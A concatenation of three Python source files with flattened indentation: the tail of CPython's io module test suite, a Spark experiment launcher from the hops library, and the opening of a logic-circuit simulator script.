txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows and OpenVMS, however, lseek
# somehow succeeds on pipes.
if sys.platform not in ('win32', 'OpenVMS'):
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
@unittest.skipIf(sys.platform == 'OpenVMS',
'OpenVMS os.set_blocking() works only for sockets')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
launcher.py
|
"""
Simple experiment implementation
"""
from hops.experiment_impl.util import experiment_utils
from hops import devices, tensorboard, hdfs
import pydoop.hdfs
import threading
import time
import json
import os
import six
def _run(sc, map_fun, run_id, args_dict=None, local_logdir=False, name="no-name"):
"""
Args:
sc:
map_fun:
args_dict:
local_logdir:
name:
Returns:
"""
app_id = str(sc.applicationId)
if args_dict == None:
num_executions = 1
else:
arg_lists = list(args_dict.values())
currentLen = len(arg_lists[0])
for i in range(len(arg_lists)):
if currentLen != len(arg_lists[i]):
raise ValueError('Length of each function argument list must be equal')
num_executions = len(arg_lists[i])
sc.setJobGroup(os.environ['ML_ID'], "{} | Launcher running experiment".format(name))
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, args_dict, local_logdir))
print('Finished Experiment \n')
# For single run return .return if exists
if args_dict == None:
path_to_return = experiment_utils._get_logdir(app_id, run_id) + '/.outputs.json'
if hdfs.exists(path_to_return):
return_json = hdfs.load(path_to_return)
return_dict = json.loads(return_json)
return experiment_utils._get_logdir(app_id, run_id), return_dict
else:
return experiment_utils._get_logdir(app_id, run_id), None
elif num_executions == 1:
arg_count = six.get_function_code(map_fun).co_argcount
arg_names = six.get_function_code(map_fun).co_varnames
argIndex = 0
param_string = ''
while arg_count > 0:
param_name = arg_names[argIndex]
param_val = args_dict[param_name][0]
param_string += str(param_name) + '=' + str(param_val) + '&'
arg_count -= 1
argIndex += 1
param_string = param_string[:-1]
path_to_return = experiment_utils._get_logdir(app_id, run_id) + '/' + param_string + '/.outputs.json'
if hdfs.exists(path_to_return):
return_json = hdfs.load(path_to_return)
return_dict = json.loads(return_json)
return experiment_utils._get_logdir(app_id, run_id), return_dict
else:
return experiment_utils._get_logdir(app_id, run_id), None
else:
return experiment_utils._get_logdir(app_id, run_id), None
#Helper to put Spark required parameter iter in function signature
def _prepare_func(app_id, run_id, map_fun, args_dict, local_logdir):
"""
Args:
app_id:
run_id:
map_fun:
args_dict:
local_logdir:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
tb_hdfs_path = ''
hdfs_exec_logdir = experiment_utils._get_logdir(app_id, run_id)
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
try:
#Arguments
if args_dict:
param_string, params, args = experiment_utils.build_parameters(map_fun, executor_num, args_dict)
hdfs_exec_logdir, hdfs_appid_logdir = experiment_utils._create_experiment_subdirectories(app_id, run_id, param_string, 'grid_search', params=params)
logfile = experiment_utils._init_logger(hdfs_exec_logdir)
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir)
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task ' + param_string)
task_start = time.time()
retval = map_fun(*args)
task_end = time.time()
experiment_utils._handle_return_simple(retval, hdfs_exec_logdir, logfile)
time_str = 'Finished task ' + param_string + ' - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('-------------------------------------------------------')
else:
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_exec_logdir, executor_num, local_logdir=local_logdir)
logfile = experiment_utils._init_logger(hdfs_exec_logdir)
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task')
task_start = time.time()
retval = map_fun()
task_end = time.time()
experiment_utils._handle_return_simple(retval, hdfs_exec_logdir, logfile)
time_str = 'Finished task - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun
|
simulator.py
|
import config as con
import gates as gt
import construct_circuit as cc
import read_code as rc
import plot_data as pd
import error_handle as eh
import arducom as ad
import subcircuit_definition as sd
import functional_node_sort as fns
import analysis_data as analyd
import time
import thread
import threading
import os
import analysis_data as analyd
##########################################################################################################################
def stop_thread(thread):
thread.join()
con.circuit_simulation_flag=False
con.end_time=time.clock()
##########################################################################################################################
def clocking():
con.current_time=time.clock()
if con.CLOCK_DATA!=None:
if con.CLOCK_DATA[5]==0:
if (con.current_time-con.last_time)>=con.CLOCK_DATA[1]:
con.CLOCK_DATA[5]=1
con.last_time=con.current_time
else:
if con.CLOCK_DATA[4]==0:
if (con.current_time-con.last_time)>=con.CLOCK_DATA[3]:
con.CLOCK_DATA[4]=1
con.NODE_DATA[con.CLOCK_DATA[0]][2]=con.CLOCK_DATA[4]
con.last_time=con.current_time
else:
if (con.current_time-con.last_time)>=con.CLOCK_DATA[2]:
con.CLOCK_DATA[4]=0
con.NODE_DATA[con.CLOCK_DATA[0]][2]=con.CLOCK_DATA[4]
con.last_time=con.current_time
###########################################################################################################################
def clock_flaging(a_time):
con.current_time=time.clock()
elapsed_time=con.current_time-con.start_time
if (elapsed_time*1000)>=a_time:
return True
else:
return False
###########################################################################################################################
def real_time_circuit_simulation(lock):
try:
while con.circuit_simulation_flag:
clocking()
lock.acquire()
simulator()
lock.release()
